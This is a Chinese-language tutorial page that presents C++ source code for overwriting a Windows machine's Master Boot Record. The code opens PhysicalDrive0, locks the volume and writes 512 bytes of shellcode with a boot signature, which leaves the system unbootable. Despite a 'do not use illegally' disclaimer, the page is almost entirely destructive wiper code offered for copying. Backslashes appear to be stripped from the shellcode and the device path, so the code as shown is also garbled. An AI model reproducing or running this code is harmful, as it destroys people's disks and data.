本文实例讲述了C++破坏MBR的代码，该源码只有破坏作用，使系统无法进入。仅供大家参考借鉴之用。请勿用于非法目的。

源码来源于网上。具体代码如下：

复制代码 代码如下:#include <Windows.h>

#include <stdio.h>

//shellcode随便写了点 能破坏MBR,无法进入系统

unsigned char scode[]=

"xb8x12x00"

"xcdx10xbd"

"x18x7cxb9";

DWORD writeMBR()

{

DWORD dwBytesReturned;

BYTE pMBR[512]={0};

//将破坏代码写入变量pMBR

memcpy(pMBR, scode, sizeof(scode));

pMBR[510]=0x55;

pMBR[511]=0xaa;

//打开物理磁盘

HANDLE hDevice = CreateFile(".PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE)

{

printf("createfile failed...");

return -1;

}

//锁定卷，使用FSCTL_LOCK_VOLUME时，以下有几个参数设为NULL,0;

/*Parameters

hDevice

A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function.

dwIoControlCode

The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation.

lpInBuffer

Not used with this operation; set to NULL.

nInBufferSize

Not used with this operation; set to zero.

lpOutBuffer

Not used with this operation; set to NULL.

nOutBufferSize

Not used with this operation; set to zero.

lpBytesReturned

A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */

DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

//写入磁盘文件

WriteFile(hDevice, pMBR, 512, &dwBytesReturned, NULL);

DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

return 0;

}

int main(int argc, char* argv[])

{

writeMBR();

return 0;

}

希望本文所述对大家的C++程序设计有所帮助。